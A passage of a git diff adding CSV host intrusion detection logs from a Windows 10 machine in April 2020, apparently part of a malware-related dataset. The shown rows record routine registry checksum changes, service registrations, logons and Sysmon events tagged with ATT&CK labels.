2020 @ 14:52:31.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:31.837",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:31.680",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:31.664",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:31.478",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'c24356a255f876bd6fccfcb32936aae9' +New md5sum is : '61ab47c110186181be5841f0689573b8' +Old sha1sum was: 'bbde208ff893d96d36d0af5f942c549646a33ded' +New sha1sum is : '84a0f5edd7ca01077ce40b0b34caf30a5c540757' +" +"Apr 4, 2020 @ 14:52:30.071",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:30.055",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:29.899",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:29.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:29.774",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:29.758",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:27.633",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:27.617",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 14:52:27.587",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 14:52:27.571",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 14:52:27.556",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 14:52:27.540",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 14:52:27.508",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:26.696",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:26.681",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:26.383",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'ea109dad61f26278b2a007ef17c996b7' +New md5sum is : '391e6190a43f25a6d49b328e881151f2' +Old sha1sum was: '65aaeb86d6981ea8d7cb0875bc5974767c52e2e7' +New sha1sum is : 'cb89eae2ff9d767b122c251ae24344032323577c' +" +"Apr 4, 2020 @ 14:52:26.367",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'b9c939bb4103da27bcb085a47d9614db' +New md5sum is : '9057fba4630e09ce70521eb5fd36d298' +Old sha1sum was: '98c5954e670ce716b157d2f76bc614f20494e8cb' +New sha1sum is : '7087d6d51528c07bb2426ba2614f9da2b354198a' +" +"Apr 4, 2020 @ 14:52:26.336",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '4743bf5169df2fe349c39c2c4b10c0ec' +New md5sum is : '5202222deaf563b19616c59012a497e7' +Old sha1sum was: 'e221e2b5b3f6c85c64e2d06cd98fae818a2759cc' +New sha1sum is : 'b88fa88cf50848d8bac9d14b3d9e7fd30c205558' +" +"Apr 4, 2020 @ 14:52:22.322",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:22.306",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:14.758",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:51:28.492",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 14:51:05.835",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:50:58.664",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 14:50:58.619",3,"Windows User Logoff", +"Apr 4, 2020 @ 14:50:58.603",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 14:50:58.538",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 14:50:49.677",3,"The Windows Search Service started", +"Apr 4, 2020 @ 14:50:49.397",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:50:49.366",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:50:49.231",3,"The database engine attached a database", +"Apr 4, 2020 @ 14:50:49.123",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 14:50:47.551",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 14:50:47.344",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 14:50:46.447",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 14:50:46.131",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:50:45.539",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 4, 2020 @ 14:50:01.640",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 14:50:01.613",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 14:49:38.267",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:49:34.034",3,"Service startup type was changed", +"Apr 4, 2020 @ 14:49:24.674",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 14:48:17.329",3,"The database engine attached a database", +"Apr 4, 2020 @ 14:48:17.232",3,"The database engine has completed recovery steps", +"Apr 4, 2020 @ 14:48:17.178",3,"The database engine is replaying log file C:\Winnt\system32\wins\j50.log", +"Apr 4, 2020 @ 14:48:17.138",3,"The database engine is initiating recovery steps", +"Apr 4, 2020 @ 14:48:17.122",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 14:47:31.008",4,"Summary event of the report's signatures", +"Apr 4, 2020 @ 14:47:27.446",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:47:26.586",9,"Windows Application error event", diff --git a/data/MW_2_HIDS_2.csv b/data/MW_2_HIDS_2.csv new file mode 100644 index 0000000..582d31a --- /dev/null +++ b/data/MW_2_HIDS_2.csv @@ -0,0 +1,1873 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 12:42:32.738",5,"The VSS service is shutting down due to idle timeout",,"""The VSS service is shutting down due to idle timeout. """ +"Apr 24, 2020 @ 12:42:31.064",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:32:28Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:41:45.658",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:41:45.644",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 12:41:10.392",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:39:59.594",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'ee41f99b03a77f3c189e5f458a2e0eff' +New md5sum is : '43e0f4d6dc1809edc58cbf8b28b327b4' +Old sha1sum was: 'd913a7cb81a63d409ab5ab6f958256b230345c64' +New sha1sum is : '43c975d8c59b4fde5f23a7255157fa4c078d258e' +", +"Apr 24, 2020 @ 12:39:59.578",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '304055d1dd3ac64413cbdc3e4618dc79' +New md5sum is : '3637a2390d483d94ade709712c01636c' +Old sha1sum was: '8711dfbf248032c28bd322e9c598e25a7019f2af' +New sha1sum is : 'bb81cae0ed1a0d8b5efce8411b122fd1ab66d54e' +", +"Apr 24, 2020 @ 12:39:51.816",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:39:40.592",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '5689c2dd6ed61a04cc389b6099c0aea5' +New md5sum is : '113b4cbed5989a54d95116790d0033a9' +Old sha1sum was: '64932df77c40a56e97edb3553ce359b3aaff132e' +New sha1sum is : 'bf6ddfd7385195419d1e1eeb16a780441e9e0acc' +", +"Apr 24, 2020 @ 12:39:40.264",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '5b91e535422785d7409df5362ceec530' +New md5sum is : '0447d0d52ee5a830c05fbee07043f258' +Old sha1sum was: '4e27ba555e6d427aef066e320154eafec1fd64e2' +New sha1sum is : 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +", +"Apr 24, 2020 @ 12:39:33.780",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 12:39:32.851",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:39:27.874",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:39:24.827",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcbService\NCBKapiNlmCache\4' checksum changed. +Old md5sum was: 'd3b06376b75fbbf91af26eaf1e84777f' +New md5sum is : '3e7320567909d8362377650725f71627' +Old sha1sum was: '6a70d1d8d0e8d591a19001c90000fdbb8ceb05bf' +New sha1sum is : 'd7d1983b9bab8f6a58d54df9e5ba6588f5693b81' +", +"Apr 24, 2020 @ 12:39:23.844",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:33:21Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:39:15.640",5,"The VSS service is shutting down due to idle timeout",,"""The VSS service is shutting down due to idle timeout. """ +"Apr 24, 2020 @ 12:39:13.812",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:39:12.640",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\GoogleChromeElevationService' checksum changed. +Old md5sum was: '8689e28cb67cdeb16cd0f213c561238e' +New md5sum is : '7623ffed143b7459169ba5677dbcbf32' +Old sha1sum was: '9a0d97c845587be7605acb61023bb439126934df' +New sha1sum is : '0a808618d3ad142d9f619d043ca088fdcfc9a841' +", +"Apr 24, 2020 @ 12:38:58.448",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\Chrome' checksum changed. +Old md5sum was: '5af3a18aae7113a12564a454973b2929' +New md5sum is : '22ece9a19429dc28f03e236b27d22f81' +Old sha1sum was: '0a00a2e519a32df06bc9533712e616c7a04e7c55' +New sha1sum is : 'd43b78e147f35d6834e93dded1d3c6395c512b09' +", +"Apr 24, 2020 @ 12:38:47.181",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '816e4c6e0ef2bfa0679631e42e89c389' +New md5sum is : '4dca121be9a027ca0a7d790d455bd48d' +Old sha1sum was: 'b8924f00f04db3ced0f56da547b0a3acc41c2b86' +New sha1sum is : '7c6e24ecf2f7f64b1b68cfe295a00dd26949ecd8' +", +"Apr 24, 2020 @ 12:37:15.133",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 12:37:12.023",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 12:36:44.507",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 12:36:18.272",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '271f59daf9ca28fbeb0bd234897e1662' +New md5sum is : '1af7f0914012f801bdabc07119bd84db' +Old sha1sum was: 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +New sha1sum is : '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +", +"Apr 24, 2020 @ 12:36:16.992",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '47f9a8fc035cc80b23dfd8be4d23cda6' +New md5sum is : '808c317f44b41ac662c03e64ae191df7' +Old sha1sum was: '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +New sha1sum is : 'cc7c06123ee56b0fe3d451e87d288d35e76cb4de' +", +"Apr 24, 2020 @ 12:36:16.977",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '480a7b1436febced63b663e198db057e' +New md5sum is : 'c6e83335e428d012cffb29f1570868b1' +Old sha1sum was: 'a366c53c7d877bd13ac0386830dbad1b52127af9' +New sha1sum is : 'e1de9238546bfb9f39c43db2beee554f6c05d8a8' +", +"Apr 24, 2020 @ 12:36:13.398",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3f376' was added. +", +"Apr 24, 2020 @ 12:36:13.368",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3f376\Security' was added. +", +"Apr 24, 2020 @ 12:36:10.929",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:36:07.425501100Z"",""eventRecordID"":""1021"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:36:07.409\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath\r\nDetails: \""C:\\Program Files (x86)\\Google\\Chrome\\Application\\81.0.4044.122\\elevation_service.exe\""\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:36:07.409"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\ImagePath"",""details"":""\\\""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\81.0.4044.122\\\\elevation_service.exe\\\""""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:36:07.409 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath +Details: ""C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.122\elevation_service.exe""""" +"Apr 24, 2020 @ 12:36:10.906",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:36:07.424301100Z"",""eventRecordID"":""1020"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:36:07.409\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:36:07.409"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:36:07.409 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:36:03.085",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '1eb44bc3df61ffb5ee9a93e1f84bbcdc' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '17394125b09262baf818402c807f15879696de6c' +", +"Apr 24, 2020 @ 12:36:03.039",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '1930b7b98646b0623c4d71c29ee5577a' +New md5sum is : 'ee41f99b03a77f3c189e5f458a2e0eff' +Old sha1sum was: '734e001445fab8494836c3ebbc7b6ed4be5733d7' +New sha1sum is : 'd913a7cb81a63d409ab5ab6f958256b230345c64' +", +"Apr 24, 2020 @ 12:36:03.018",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '08af0e89b70fc23b04544d71af2b61c5' +New md5sum is : '304055d1dd3ac64413cbdc3e4618dc79' +Old sha1sum was: 'cc74990798ae65506078b5b0d1f8cd9895cac982' +New sha1sum is : '8711dfbf248032c28bd322e9c598e25a7019f2af' +", +"Apr 24, 2020 @ 12:36:02.320",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '7b25497674cc671619a3e52c5a6b72e8' +New md5sum is : 'd157b95ae59e3c51189e40a47c1dbfb4' +Old sha1sum was: 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +New sha1sum is : '1a68895ab83f260ab600fa4471c8e2e1102a5ceb' +", +"Apr 24, 2020 @ 12:36:01.397",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:36:01.306",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:36:00.498",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : 